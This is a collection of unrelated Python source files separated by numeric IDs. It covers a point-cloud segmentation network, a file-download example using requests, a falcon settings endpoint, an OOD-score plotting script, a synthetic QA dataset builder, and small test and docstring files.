indices = ids_conv0 + ids10 + ids11 + ids20 + ids21 + ids30 + ids31 + ids40 + ids41
if self.segmentation:
ids3u = upsample_nearest(support4[0], support3[0])
ids2u = upsample_nearest(support3[0], support2[0])
ids1u = upsample_nearest(support2[0], support1[0])
ids0u = upsample_nearest(support1[0], pos)
indices += [ids3u, ids2u, ids1u, ids0u]
return None, support_points, indices
def forward_with_features(self, x, pos, support_points=None, indices=None):
if (support_points is None) or (indices is None):
_, indices, support_points = self.compute_indices(pos)
if self.segmentation:
ids0, ids10, ids11, ids20, ids21, ids30, ids31, ids40, ids41, ids3u, ids2u, ids1u, ids0u = indices
else:
ids0, ids10, ids11, ids20, ids21, ids30, ids31, ids40, ids41 = indices
support1, support2, support3, support4 = support_points
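        # Encoder: each resnetbX0 block downsamples the point cloud (ratio=0.25) and doubles the channel
        # width; the following resnetbX1 block refines features at the same resolution.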
x0 = self.activation(self.bn0(self.cv0(x, pos, pos, ids0)))
x0 = self.resnetb01(x0, pos, pos, ids0)
x1 = self.resnetb10(x0, pos, support1, ids10)
x1 = self.resnetb11(x1, support1, support1, ids11)
x2 = self.resnetb20(x1, support1, support2, ids20)
x2 = self.resnetb21(x2, support2, support2, ids21)
x3 = self.resnetb30(x2, support2, support3, ids30)
x3 = self.resnetb31(x3, support3, support3, ids31)
x4 = self.resnetb40(x3, support3, support4, ids40)
x4 = self.resnetb41(x4, support4, support4, ids41)
if self.segmentation:
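            # Decoder (segmentation head): concatenate a globally max-pooled context vector, then walk back
            # up the resolutions with the stored nearest-neighbour indices (ids3u..ids0u), U-Net style,
            # before the final per-point classifier.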
x5 = x4.max(dim=2, keepdim=True)[0].expand_as(x4)
x4 = self.activation(self.bn5(self.cv5(torch.cat([x4, x5], dim=1))))
xout = batch_gather(x4, 2, ids3u)
xout = self.activation(self.bn3d(self.cv3d(torch.cat([xout, x3], dim=1))))
xout = batch_gather(xout, 2, ids2u)
xout = self.activation(self.bn2d(self.cv2d(torch.cat([xout, x2], dim=1))))
xout = batch_gather(xout, 2, ids1u)
xout = self.activation(self.bn1d(self.cv1d(torch.cat([xout, x1], dim=1))))
xout = batch_gather(xout, 2, ids0u)
xout = self.activation(self.bn0d(self.cv0d(torch.cat([xout, x0], dim=1))))
xout = self.dropout(xout)
xout = self.fcout(xout)
else:
xout = x4.mean(dim=2)
xout = self.dropout(xout)
xout = self.fcout(xout)
return xout
|
57272
|
import requests
import os
url_image = 'https://www.python.org/static/community_logos/python-logo.png'
r_image = requests.get(url_image)
print(r_image.headers['Content-Type'])
# image/png
filename_image = os.path.basename(url_image)
print(filename_image)
# python-logo.png
with open('data/temp/' + filename_image, 'wb') as f:
f.write(r_image.content)
url_zip = 'http://www.post.japanpost.jp/zipcode/dl/oogaki/zip/13tokyo.zip'
r_zip = requests.get(url_zip)
print(r_zip.headers['Content-Type'])
# application/zip
filename_zip = os.path.basename(url_zip)
print(filename_zip)
# 13tokyo.zip
with open('data/temp/' + filename_zip, 'wb') as f:
f.write(r_zip.content)
|
57297
|
import falcon
import six
from monitorrent.settings_manager import SettingsManager
# noinspection PyUnusedLocal
class SettingsNotifyOn(object):
def __init__(self, settings_manager):
"""
:type settings_manager: SettingsManager
"""
self.settings_manager = settings_manager
def on_get(self, req, resp):
resp.json = self.settings_manager.get_external_notifications_levels()
def on_put(self, req, resp):
if req.json is None or len(req.json) == 0:
            raise falcon.HTTPBadRequest('BodyRequired', 'Expecting a non-empty JSON body')
if not isinstance(req.json, list) or any([not isinstance(i, six.text_type) for i in req.json]):
raise falcon.HTTPBadRequest('ArrayOfStringExpected', 'Expecting list of string values')
existing_levels = self.settings_manager.get_existing_external_notifications_levels()
unknown_levels = [l for l in req.json if l not in existing_levels]
if len(unknown_levels) > 0:
            raise falcon.HTTPBadRequest('UnknownLevels', '{0} are unknown levels'.format(unknown_levels))
self.settings_manager.set_external_notifications_levels(req.json)
resp.status = falcon.HTTP_NO_CONTENT
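# --- Usage sketch (editor's addition, hypothetical route wiring) ---------------
# How this resource might be mounted on a falcon API. The route path is an
# assumption, and monitorrent's req.json / resp.json helpers come from its own
# middleware, which is not shown in this file.
def add_settings_notify_on_route(api, settings_manager):
    api.add_route('/api/settings/notify-on', SettingsNotifyOn(settings_manager))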
|
57322
|
import matplotlib.pyplot as plt
import numpy as np
import os
import pickle
def get_mean_stds(data):
return np.mean(data), np.std(data) / np.sqrt(len(data)) * 1.96
if __name__ == '__main__':
labels = ['OpenTAL', 'EDL', 'SoftMax']
result_folders = ['edl_oshead_iou', 'edl_15kc', 'default']
colors = ['k', 'g', 'm']
split = '0'
tiou_target = 0.3
    tidx = 0  # 0-4 for tIoU thresholds [0.3, ..., 0.7]
items = ['$TP_{u2u}$', '$TP_{k2k}$', '$FP_{u2k}$', '$FP_{k2k}$', '$FP_{k2u}$', '$FP_{bg2u}$', '$FP_{bg2k}$']
fontsize = 18
width = 0.25
fig_path = 'experiments/figs'
os.makedirs(fig_path, exist_ok=True)
xrng = np.arange(len(items))
fig, ax = plt.subplots(1,1, figsize=(8,5))
plt.rcParams["font.family"] = "Arial"
for idx, (folder, label, color) in enumerate(zip(result_folders, labels, colors)):
# load result file
result_file = os.path.join('output', folder, f'split_{split}', 'open_stats.pkl')
with open(result_file, 'rb') as f:
stats = pickle.load(f)
print(label)
all_scores = 1 - np.array(stats['ood_scores'])
mean_scores = np.zeros((7))
std_scores = np.zeros((7))
mean_scores[0], std_scores[0] = get_mean_stds(all_scores[stats['tp_u2u'][tidx] > 0])
mean_scores[1], std_scores[1] = get_mean_stds(all_scores[stats['tp_k2k'][tidx].sum(axis=0) > 0])
mean_scores[2], std_scores[2] = get_mean_stds(all_scores[stats['fp_u2k'][tidx].sum(axis=0) > 0])
mean_scores[3], std_scores[3] = get_mean_stds(all_scores[stats['fp_k2k'][tidx].sum(axis=0) > 0])
mean_scores[4], std_scores[4] = get_mean_stds(all_scores[stats['fp_k2u'][tidx] > 0])
mean_scores[5], std_scores[5] = get_mean_stds(all_scores[stats['fp_bg2u'][tidx] > 0])
mean_scores[6], std_scores[6] = get_mean_stds(all_scores[stats['fp_bg2k'][tidx].sum(axis=0) > 0])
h = ax.bar(xrng + (idx-1) * width, mean_scores, yerr=std_scores, width=width, label=f'{label}', align='center', alpha=0.5, ecolor='black', color=color)
ax.set_ylim(0, 1.2)
ax.set_ylabel('OOD Scores', fontsize=fontsize)
ax.set_xticks(xrng)
ax.set_xticklabels(items, fontsize=fontsize-3)
ax.legend(fontsize=fontsize, loc='upper center', ncol=3)
plt.yticks(fontsize=fontsize)
plt.tight_layout()
plt.savefig(os.path.join(fig_path, 'OOD_Score_compare.png'))
|
57355
|
import random
import _jsonnet, json
import logging
import hashlib
import os
from copy import deepcopy
import pandas as pd
from tqdm import tqdm
import math
from LeapOfThought.resources.teachai_kb import TeachAIKB
from LeapOfThought.common.general import num2words1, bc
from LeapOfThought.common.data_utils import uniform_sample_by_column, pandas_multi_column_agg
# This is mainly for testing and debugging ...
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 500)
pd.set_option('display.width', 2000)
pd.set_option('display.max_colwidth', 200)
pd.set_option("display.colheader_justify","left")
import numpy as np
from LeapOfThought.common.file_utils import upload_jsonl_to_s3, save_jsonl_to_local, is_path_creatable
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
level=logging.INFO)
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
class ArtiSet():
def __init__(self, args):
random.seed(17)
np.random.seed(1234)
self._np_seed = np.random.RandomState(17)
with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), args.config_path) ,'r') as f:
self._config = json.load(f)[self.artiset_name]
if args.__contains__('variant') and len(args.variant) > 0:
self._output_file = args.output_file.replace('.jsonl','_' + args.variant + '.jsonl')
if len(args.experiment_version) > 0:
self._output_file = self._output_file.replace('.jsonl', '_' + args.experiment_version + '.jsonl')
else:
self._output_file = args.output_file
self._split = args.split_by_field
self._incorrect_beliefs = None
if "incorrect_beliefs_file" in args and args.incorrect_beliefs_file:
with open(args.incorrect_beliefs_file, 'r') as file:
self._incorrect_beliefs = [json.loads(line.strip()) for line in file]
self._save_sample = args.save_sample
self.artiset_data = []
def append_teachyourai_format_example(self, example, do_print=False, append_to_list=None):
"""append_teachyourai_format_example() is method implemented in ArtiSet class and takes an example dict
(that must contain a "phrase", "answer") and converts it to a BooleanQA format
Args:
example (dict): an example containing question,answer,dist1,dist2 fields
do_print (bool): just for debuging
num_choices (int): number of choices in question (between 2 and 5)
append_to_list (list): a
Returns:
"""
if 'context' not in example:
example['context'] = ''
if 'id' not in example:
example['id'] = self.create_qid(example)
if do_print:
            print('Q:%s || A:%s' % (example['phrase'], example['answer']))
if append_to_list is not None:
append_to_list.append(example)
else:
self.artiset_data.append(example)
@staticmethod
def create_qid(example):
m = hashlib.md5()
m.update(example['phrase'].encode())
m.update(example['context'].encode())
# boolean examples have binary answer (int 0 or 1)
m.update(str(example['answer']).encode())
return m.hexdigest()
def split_by_columns(self):
split_columns = self._split.split(',')
examples = self.examples_meta
indexes = {}
# check the split columns are in the data
if len(set(split_columns) - set(examples.columns)) != 0:
            raise ValueError("split columns used to split dev/test and train set do not exist in examples_meta!")
all_objs = []
for split_column in split_columns:
all_objs += list(examples[split_column])
#best_train_inds, best_dev_inds, best_test_inds = [], [], []
inds = [i for i in range(len(self.artiset_data))]
random.seed(17)
random.shuffle(inds)
if len(split_columns) > 1:
test_inds = random.sample(inds, self._config['test_dev_size'][0])
inds = list(set(inds) - set(test_inds))
dev_inds = random.sample(inds, self._config['test_dev_size'][1])
dev_test_examples = examples.iloc[test_inds + dev_inds]
dev_test_objs = []
for split_column in split_columns:
dev_test_objs += list(dev_test_examples[split_column])
dev_test_objs = pd.Series(list(set(dev_test_objs)))
else:
            # We'll choose the test-dev examples from values of the split column that have the lowest number of examples.
            # This ensures we keep the highest number of training examples that are still disjoint on split_columns[0] from dev+test.
split_columns_value_counts = examples[split_columns[0]].value_counts().sort_values().cumsum().reset_index()
start_ind = split_columns_value_counts[split_columns_value_counts[split_columns[0]] > \
sum(self._config['test_dev_size'])].index[0] + 1
dev_test_objs = list(split_columns_value_counts['index'][0:start_ind])
dev_test_examples = examples[examples[split_columns[0]].isin(dev_test_objs)]
inds = list(dev_test_examples.index)
test_inds = random.sample(inds, self._config['test_dev_size'][0])
inds = list(set(inds) - set(test_inds))
dev_inds = random.sample(inds, self._config['test_dev_size'][1])
for split_column in split_columns:
indexes[split_column] = examples.set_index(split_column)
dev_ids = set()
not_in_train_ids = set()
for split_column in split_columns:
dev_ids = dev_ids & set(indexes[split_column][indexes[split_column].index.isin(dev_test_objs)]['qid'])
not_in_train_ids = not_in_train_ids | set(indexes[split_column][indexes[split_column].index.isin(dev_test_objs)]['qid'])
train_examples = examples.loc[~examples['qid'].isin(not_in_train_ids), :]
train_inds = list(train_examples.index)
if len(train_inds) > self._config['max_number_of_examples']:
train_inds = train_inds[0:self._config['max_number_of_examples']]
random.shuffle(train_inds)
print("total dev-test examples available: %d" % (len(dev_test_examples)))
print("split produced %d training examples" % (len(train_inds)))
return train_inds, dev_inds, test_inds
def save_dataset(self):
"""save_dataset() automatically saves the artiset
if the config output_file contains the string _sample.jsonl it will be saved in a more readable format
otherwise it will split the examples in self.artiset_data into train, dev, test and save them in s3
if output_file startswith s3:// otherwise locally. (If output_file is empty, it will not save)
Args:
arg1 (int): Description of arg1
arg2 (str): Description of arg2
Returns:
bool: Description of return value
"""
# Move non-required columns to metadata:
artiset_data_with_metadata = []
for example in self.artiset_data:
if 'metadata' not in example:
new_example = {'metadata':{}}
else:
new_example = {'metadata': example['metadata']}
new_example.update({k:example[k] for k in ['id', 'phrase', 'context', 'answer']})
new_example['metadata'].update({k: example[k] for k in set(example.keys()) - {'id', 'phrase', 'context', 'answer','metadata'}})
artiset_data_with_metadata.append(new_example)
self.artiset_data = artiset_data_with_metadata
# splitting
if len(self._split) > 0:
train_inds, dev_inds, test_inds = self.split_by_columns()
elif 'split' in self.examples_meta:
test_inds = list(self.examples_meta[self.examples_meta['split'] == 'test'].index)
dev_inds = list(self.examples_meta[self.examples_meta['split'] == 'dev'].index)
train_inds = list(self.examples_meta[self.examples_meta['split'] == 'train'].index)
random.seed(17)
random.shuffle(train_inds)
#random.shuffle(test_inds)
#random.shuffle(dev_inds)
test_inds = test_inds[0: self._config['test_dev_size'][0]]
dev_inds = dev_inds[0:self._config['test_dev_size'][1]]
train_inds = train_inds[0:self._config['max_number_of_examples']]
else:
inds = [i for i in range(len(self.artiset_data))]
random.seed(17)
random.shuffle(inds)
test_inds = inds[0:self._config['test_dev_size'][0]]
dev_inds = inds[self._config['test_dev_size'][0]:sum(self._config['test_dev_size'])]
train_inds = inds[sum(self._config['test_dev_size']):]
if self._output_file.startswith('s3://'):
save_func = upload_jsonl_to_s3
elif is_path_creatable(self._output_file) and len(self._output_file) > 0:
save_func = save_jsonl_to_local
else:
# Do nothing
return
if self._save_sample:
if 'split' in self.examples_meta.columns:
logger.info(f"size of each split:\n{self.examples_meta['split'].value_counts()}")
random.seed(17)
if len(self.artiset_data) > 100:
self.artiset_data = random.sample(self.artiset_data,100)
save_func(self._output_file, self.artiset_data, sample_indent=self._save_sample)
else:
logger.info('uploading %d,%d,%d test,dev,train examples' % (len(test_inds),len(dev_inds),len(train_inds)))
save_func(self._output_file.replace('.jsonl', '_test.jsonl'), [self.artiset_data[i] for i in test_inds])
save_func(self._output_file.replace('.jsonl', '_dev.jsonl'), [self.artiset_data[i] for i in dev_inds])
save_func(self._output_file.replace('.jsonl', '_train.jsonl'), [self.artiset_data[i] for i in train_inds])
if len(self.examples_meta) > 0:
save_func(self._output_file.replace('.jsonl', '_meta.jsonl'), self.examples_meta.to_dict(orient='rows'))
return train_inds, dev_inds, test_inds
def save_single_split(self, split_data, split):
inds = [i for i in range(len(split_data))]
random.seed(17)
random.shuffle(inds)
if self._output_file.startswith('s3://'):
save_func = upload_jsonl_to_s3
elif is_path_creatable(self._output_file) and len(self._output_file) > 0:
save_func = save_jsonl_to_local
else:
# Do nothing
return
si = self._output_file.find('_sample') > -1
save_func(self._output_file.replace('.jsonl', '_' + split + '.jsonl'), [split_data[i] for i in inds], sample_indent=si)
def save_aux_data(self, output_file, data):
if output_file.startswith('s3://'):
save_func = upload_jsonl_to_s3
elif is_path_creatable(output_file) and len(output_file) > 0:
save_func = save_jsonl_to_local
else:
# Do nothing
return
si = output_file.find('_sample') > -1
save_func(output_file, data, sample_indent=si)
def build_artificial_dataset(self,args):
pass
def resplit(self, args):
logger.error('Not implemented for this artiset')
def build_statement_rule_property_examples(self, examples, split, statement_tag='statement', ablate_same_distractor_fields = 1.0,\
rule_tags=['implicit_rule','property'], distractor_tags = ['distractors'], ablation_list=[], use_shorthand=False, \
nlg_sampling=False, reverse_validity_frac=0):
# computing ID before ablations on the statement and rule tags:
for i, example in enumerate(examples):
m = hashlib.md5()
# note that the tags for ID creation are always the same!
for tag in [statement_tag] + rule_tags:
if tag in example:
if type(example[tag]) == list:
for e in example[tag]:
m.update(e['subject'].encode())
m.update(e['predicate'].encode())
m.update(e['object'].encode())
m.update(e['validity'].encode())
else:
m.update(example[tag]['subject'].encode())
m.update(example[tag]['predicate'].encode())
m.update(example[tag]['object'].encode())
m.update(example[tag]['validity'].encode())
example['id'] = m.hexdigest()
# Ablations
# now that all the examples are ready, we can ablate as needed:
random.seed(17)
for ablation in ablation_list:
if len(ablation) == 3:
fields, fraction, condition = ablation
examples_cands = [e for e in examples if e[condition[0]] in condition[1]]
else:
fields, fraction = ablation
examples_cands = examples
example_to_ablate = random.sample(examples_cands, int(fraction * float(len(examples))))
for e in example_to_ablate:
for field in fields:
if field in e:
del e[field]
# for every field we ablate we must ablate the same field from distractors!
if random.random() < ablate_same_distractor_fields:
for distractor_tag in distractor_tags:
if distractor_tag in e:
if field in e[distractor_tag]:
del e[distractor_tag][field]
random.seed(17)
for i, example in enumerate(examples):
context_rules = []
# adding actual rules
for rule_tag in rule_tags:
if rule_tag in example:
rules = example[rule_tag]
if not type(rules) == list:
rules = [rules]
for rule in rules:
reverse_validity = not rule['validity'] == 'always true'
context_rules.append(TeachAIKB().to_pseudo_language(rule,
is_rule=True, reverse_validity=reverse_validity,
use_shorthand=use_shorthand, nlg_sampling=nlg_sampling))
# adding distractors
for rule_tag in distractor_tags:
if rule_tag in example:
for field, tag_distractors in example[rule_tag].items():
for rule in tag_distractors:
rule_list = rule
if not type(rule_list) == list:
rule_list = [rule_list]
for r in rule_list:
reverse_validity = not r['validity'] == 'always true'
context_rules.append(TeachAIKB().to_pseudo_language(r, is_rule=True, reverse_validity=reverse_validity,
use_shorthand=use_shorthand,
nlg_sampling=nlg_sampling))
use_hypothetical_statement = False
if 'is_hypothetical_statement' in example and example['is_hypothetical_statement']:
use_hypothetical_statement = True
answer = 1 if example[statement_tag]['validity'] == 'always true' else 0
if self.variant != 'statement_subject_lang_selectivity':
if random.random() < reverse_validity_frac:
answer = 1 - answer
reverse_validity = True
else:
reverse_validity = False
phrase = TeachAIKB().to_pseudo_language(example[statement_tag], is_rule=False, use_shorthand=use_shorthand,
use_hypothetical_statement=use_hypothetical_statement,
nlg_sampling=nlg_sampling, reverse_validity=reverse_validity)
else:
statement_dict = deepcopy(example[statement_tag])
statement_dict['subject'] = random.sample(['foo','blah','ya','qux','aranglopa','foltopia','cakophon','baz','garply'], 1)[0]
phrase = TeachAIKB().to_pseudo_language(statement_dict, is_rule=False, use_shorthand=use_shorthand,
use_hypothetical_statement=use_hypothetical_statement,
nlg_sampling=nlg_sampling)
# creating a unique set of rules that does not include the statement.
context_rules = list(set(context_rules))
            # set order is random!! so we need to sort first to get a reproducible order.
context_rules = sorted(context_rules)
random.shuffle(context_rules)
example.update({'phrase': phrase, \
'answer': answer,
'context': ' '.join(context_rules),
'split': split,
'rules': context_rules})
# append_teachyourai_format_example() is method implemented in ArtiSet class and takes an example dict
# (that must contain a "phrase", "answer") and converts it to a BooleanQA format
self.append_teachyourai_format_example(example, do_print=False)
self.examples_meta.append(deepcopy(example))
def print_examples(self, sample):
random.seed(7)
example_inds = random.sample(range(len(self.artiset_data)), sample)
## Printing a sample!
for ind in example_inds:
example = self.artiset_data[ind]
if 'statement' in example:
statement = example['statement']
rules = '\n'.join(example['rules'])
e = f"{example['id']}({example['split']}):\n{bc.BOLD}Q:{bc.ENDC}{example['phrase']} {bc.BOLD}A:{bc.ENDC}{example['answer']}\n{bc.BOLD}C:{bc.ENDC}{rules} "
e = e.replace(statement['object'], f"{bc.Blue}{statement['object']}{bc.ENDC}")
e = e.replace(statement['predicate'], f"{bc.Green}{statement['predicate']}{bc.ENDC}")
e = e.replace(str(statement['subject']), f"{bc.Magenta}{statement['subject']}{bc.ENDC}")
if 'hypernym' in example:
hypernym = example['hypernym']['object']
e = e.replace(str(hypernym), f"{bc.Cyan}{hypernym}{bc.ENDC}")
e = e.replace('not', f"{bc.Red}not{bc.ENDC}")
e = e.replace('type', f"{bc.Yellow}type{bc.ENDC}")
if 'num_of_instances' in example:
e = e.replace(' ' + num2words1[example['num_of_instances']].lower() + ' ' \
, f"{bc.Red} {num2words1[example['num_of_instances']].lower()} {bc.ENDC}")
for number in 'one', 'two', 'three', 'four', 'five':
e = e.replace(' ' + number + ' ', f"{bc.Cyan} {number} {bc.ENDC}")
else:
e = f"{example['id']}({example['split']}):\n{bc.BOLD}Q:{bc.ENDC}{example['phrase']} {bc.BOLD}A:{bc.ENDC}{example['answer']}\n{bc.BOLD}C:{bc.ENDC}{example['context']} "
print(e + '\n')
def create_subject_filter_lookup(self, examples, sample_on=None, avoid_mixing=None):
if sample_on is not None:
triplets_to_sample_on = [e[sample_on] for e in examples]
else:
triplets_to_sample_on = examples
# building subject filter lookup:
subject_filter_lookup = {}
rules_to_sample_df = pd.DataFrame(triplets_to_sample_on)
for curr_subject, matching_records in tqdm(rules_to_sample_df.groupby('subject')):
subject_to_filter = {curr_subject}
if avoid_mixing is not None and 'predicates' in avoid_mixing:
subject_to_filter |= set(
rules_to_sample_df[~rules_to_sample_df['predicate'].isin(set(matching_records['predicate']))]['subject'])
if avoid_mixing is not None and 'hyponyms' in avoid_mixing:
subject_to_filter |= {e['subject'] for e in TeachAIKB().sample({'predicate': 'hypernym', 'object': curr_subject})}
if avoid_mixing is not None and 'co-hyponyms' in avoid_mixing:
subject_is_hyponym_of = {e['object'] for e in TeachAIKB().sample({'subject': curr_subject, 'predicate': 'hypernym'})}
subject_to_filter |= {e['subject'] for e in
TeachAIKB().sample({'predicate': 'hypernym', 'object': list(subject_is_hyponym_of)})}
if avoid_mixing is not None and 'co-meronyms' in avoid_mixing:
subject_is_meronym_of = {e['subject'] for e in TeachAIKB().sample({'predicate': 'meronym', 'object': curr_subject})}
subject_to_filter |= {e['object'] for e in
TeachAIKB().sample({'predicate': 'meronym', 'subject': list(subject_is_meronym_of)})}
subject_filter_lookup[curr_subject] = subject_to_filter
return subject_filter_lookup
#@profile
def self_negative_subject_sample(self, examples, sample_on = None, avoid_mixing=None, over_sample = 1.0):
examples = deepcopy(examples)
if sample_on is not None:
triplets_to_sample_on = [e[sample_on] for e in examples]
else:
triplets_to_sample_on = examples
subject_filter_lookup = self.create_subject_filter_lookup(examples, sample_on, avoid_mixing)
output = []
examples_to_gen_from = deepcopy(examples) + random.sample(deepcopy(examples),int((over_sample - 1) * len(examples)))
for i,example in tqdm(enumerate(examples_to_gen_from)):
# sometimes we just want a list of triplets, with no specific dictionary field called "sample_on" ...
if sample_on is not None:
curr_triplet = example[sample_on]
else:
curr_triplet = example
curr_subject = curr_triplet['subject']
if sample_on is not None:
new_edge = deepcopy(
random.sample([e for e in examples if e[sample_on]['subject'] not in subject_filter_lookup[curr_subject]], 1)[0])
new_edge[sample_on]['predicate'] = deepcopy(curr_triplet['predicate'])
new_edge[sample_on]['object'] = deepcopy(curr_triplet['object'])
new_edge[sample_on]['validity'] = 'never true'
else:
new_edge = deepcopy(
random.sample([e for e in triplets_to_sample_on if e['subject'] not in subject_filter_lookup[curr_subject]], 1)[0])
new_edge['predicate'] = deepcopy(curr_triplet['predicate'])
new_edge['object'] = deepcopy(curr_triplet['object'])
new_edge['validity'] = 'never true'
output.append(new_edge)
return output
def connect_negative_shuffle_subject(self, shuffle, shuffle_on, tar_tag, avoid_mixing=None):
logger.info(f'connect_negative_shuffle_subject {tar_tag}')
        # We assume shuffle_on is only one field (usually predicate or object).
        # Find "clusters" that may not be shuffled internally when producing negative examples
        # (because they have downward monotone relations).
connect_to = deepcopy(shuffle)
triplets_to_shuffle_df = pd.DataFrame(([e[shuffle_on] for e in shuffle]))
field_to_shuffle_counts = triplets_to_shuffle_df['subject'].value_counts()
subjects_to_shuffle = set(triplets_to_shuffle_df['subject'])
remaining_inds_to_choose = set(triplets_to_shuffle_df.index)
for curr_subject, size in field_to_shuffle_counts.iteritems():
potential_target_inds = deepcopy(remaining_inds_to_choose)
tar_subjects = subjects_to_shuffle - {curr_subject}
tar_subjects -= {e['subject'] for e in TeachAIKB().sample({'predicate': 'hypernym', 'object': curr_subject})}
if avoid_mixing is not None and 'co-hyponyms' in avoid_mixing:
subject_is_hyponym_of = {e['object'] for e in TeachAIKB().sample({'subject': curr_subject, 'predicate': 'hypernym'})}
tar_subjects -= {e['subject'] for e in
TeachAIKB().sample({'predicate': 'hypernym', 'object': list(subject_is_hyponym_of)})}
if avoid_mixing is not None and 'co-meronyms' in avoid_mixing:
subject_is_meronym_of = {e['subject'] for e in self.sample({'predicate': 'meronym', 'object': curr_subject})}
tar_subjects -= {e['object'] for e in self.sample({'predicate': 'meronym', 'subject': list(subject_is_meronym_of)})}
potential_target_inds &= set(triplets_to_shuffle_df[triplets_to_shuffle_df['subject'].isin(tar_subjects)].index)
targets = [e for e in connect_to if e[shuffle_on]['subject'] == curr_subject]
selected_inds = []
for i in random.sample(potential_target_inds, len(potential_target_inds)):
new_edge = {'subject': curr_subject,
'predicate': triplets_to_shuffle_df.loc[i, 'predicate'],
'object': triplets_to_shuffle_df.loc[i, 'object']}
# checking if there is no triplet that is true with the same values:
matching_edges_in_kb = self.lookup(new_edge)
if len(matching_edges_in_kb) == 0:
targets[len(selected_inds)][tar_tag] = new_edge
targets[len(selected_inds)][tar_tag].update({'validity': 'never true'})
selected_inds.append(i)
if len(selected_inds) >= len(targets):
break
if len(selected_inds) < len(targets):
logger.debug(f'did not find enough for {curr_subject}: {len(selected_inds)} found, {len(targets)} required')
else:
logger.debug(f'{curr_subject}: {len(selected_inds)} found.')
remaining_inds_to_choose -= set(selected_inds)
return connect_to
def sample_distractors(self, examples, sample, tar_tag):
# building indexes:
for i, sample_props in enumerate(sample):
src_tag, src_fields, sample, exactly_sample_num, connect, balance_with_statement = sample_props
# creating general indexes
indexes = {}
for field in ['subject', 'predicate', 'object', 'validity']:
indexes[field] = {}
for i, r in enumerate(examples):
if r[src_tag][field] not in indexes[field]:
indexes[field][r[src_tag][field]] = {i}
else:
indexes[field][r[src_tag][field]] |= {i}
# Link the connection to existing tags.
for i, example in tqdm(enumerate(examples), desc=f'adding distractors for {sample_props}'):
cand_inds_signed = {}
# the index helps us get candidates fast from the df of candidate_edges
cand_inds = set(range(len(examples)))
for field in src_fields:
cand_inds &= indexes[field][example[src_tag][field]]
                # making sure cand edges do not contain a duplicate of the current example
same_as_example_inds = indexes['subject'][example[src_tag]['subject']] & \
indexes['predicate'][example[src_tag]['predicate']] & \
indexes['object'][example[src_tag]['object']]
cand_inds -= same_as_example_inds
cand_inds_signed = {'always true':set(), 'never true': set()}
for validity in ['always true', 'never true']:
if validity in indexes['validity']:
cand_inds_signed[validity] |= cand_inds & indexes['validity'][validity]
if exactly_sample_num:
num_to_sample = sample
else:
num_to_sample = random.sample(range(min(len(cand_inds_signed['always true']) + \
len(cand_inds_signed['never true']), sample) + 1), 1)[0]
# Here we choose what is the validity value of the distractor we want to sample
if balance_with_statement is not None:
# balance_with_statement is not None, that means we care about the validity value balancing.
validities_to_sample = {'always true': math.ceil(num_to_sample / 2), 'never true': math.ceil(num_to_sample / 2)}
if balance_with_statement and validities_to_sample[example[src_tag]['validity']] > 0:
validities_to_sample[example[src_tag]['validity']] -= 1
else:
# Here we just randomly sample from a certain validity value (balance_with_statement is None, so it doesn't matter to us)
validities_to_sample = {'always true': 0, 'never true': 0}
validity_value_to_sample = random.sample(['always true', 'never true'],1)[0]
validities_to_sample[validity_value_to_sample] = num_to_sample
balanced_cand_inds = []
for validity, num_to_sample in validities_to_sample.items():
if len(cand_inds_signed[validity]) >= num_to_sample:
balanced_cand_inds += random.sample(cand_inds_signed[validity], num_to_sample)
# now actually sampling the rule we want to add to distractors
if tar_tag not in example:
example[tar_tag] = {}
for ind in balanced_cand_inds:
for tag in connect:
if tag not in example[tar_tag]:
example[tar_tag][tag] = []
example[tar_tag][tag].append(examples[ind][tag])
return examples
def print_stats(self):
for part in ['statement', 'implicit_rule', 'property']:
entities = {'dev': [], 'train': []}
for e in self.examples_meta:
if part in e:
if e['split'] == 'dev':
entities['dev'] += [e[part]['subject'], e[part]['object']]
elif e['split'] == 'train':
entities['train'] += [e[part]['subject'], e[part]['object']]
            if len(entities['dev']) == 0 or len(entities['train']) == 0:
logger.info(f" {part} was not found or ablated.")
continue
entities_intersection_ratio = len(set(entities['dev']) & set(entities['train'])) / \
len(set(entities['dev']) | set(entities['train']))
logger.info(f"Dev/Train entity intersection in {part} :\n{entities_intersection_ratio}\n")
if entities_intersection_ratio > 0.01:
entity_stats = pd.DataFrame(
{'dev': pd.Series(entities['dev']).value_counts(), 'train': pd.Series(entities['train']).value_counts()}).dropna()
entity_stats['min'] = entity_stats[['dev', 'train']].min(axis=1)
logger.info(f"mutual entities stats:\n{entity_stats.sort_values(by='min')}")
if 'statement' in self.examples_meta[0]:
agg = pandas_multi_column_agg(pd.DataFrame([{'predicate': e['statement']['predicate'],'split':e['split'], 'z': 1} \
for e in self.examples_meta]), ['split', 'predicate'])
logger.info(f"Predicate count per split:\n{agg}\n")
examples_meta_df = pd.DataFrame(self.examples_meta)
logger.info(f"Positive vs Negative:\n{pandas_multi_column_agg(examples_meta_df, ['split', 'answer'])}\n")
|
57376
|
from chemex.plotters.cest import CestPlotter as CestPlotter
from chemex.plotters.cpmg import CpmgPlotter as CpmgPlotter
from chemex.plotters.plotter import Plotter as Plotter
from chemex.plotters.relaxation import RelaxationPlotter as RelaxationPlotter
from chemex.plotters.shift import ShiftPlotter as ShiftPlotter
|
57379
|
from shaape.parser import Parser
import nose
import unittest
from nose.tools import *
class TestParser(unittest.TestCase):
def test_init(self):
parser = Parser()
assert parser != None
assert parser.parsed_data() == []
assert parser.drawable_objects() == []
def test_run(self):
parser = Parser()
assert_raises(NotImplementedError, parser.run, "", [])
|
57392
|
class IDGroup:
"""
The IDGroup Type
================
This type supports both iteration and the []
operator to get child ID properties.
You can also add new properties using the [] operator.
For example::
group['a float!'] = 0.0
group['an int!'] = 0
group['a string!'] = "hi!"
group['an array!'] = [0, 0, 1.0, 0]
        group['a subgroup!'] = {"float": 0.0, "an int": 1.0, "an array": [1, 2],
"another subgroup": {"a": 0.0, "str": "bleh"}}
Note that for arrays, the array type defaults to int unless a float is found
while scanning the template list; if any floats are found, then the whole
array is float. Note that double-precision floating point numbers are used for
python-created float ID properties and arrays (though the internal C api does
support single-precision floats, and the python code will read them).
    You can also delete properties with the del operator. For example::
        del group['property']
To get the type of a property, use the type() operator, for example::
if type(group['bleh']) == str: pass
To tell if the property is a group or array type, import the Blender.Types module and test
against IDGroupType and IDArrayType, like so::
        from Blender.Types import IDGroupType, IDArrayType
if type(group['bleghr']) == IDGroupType:
(do something)
@ivar name: The name of the property
@type name: string
"""
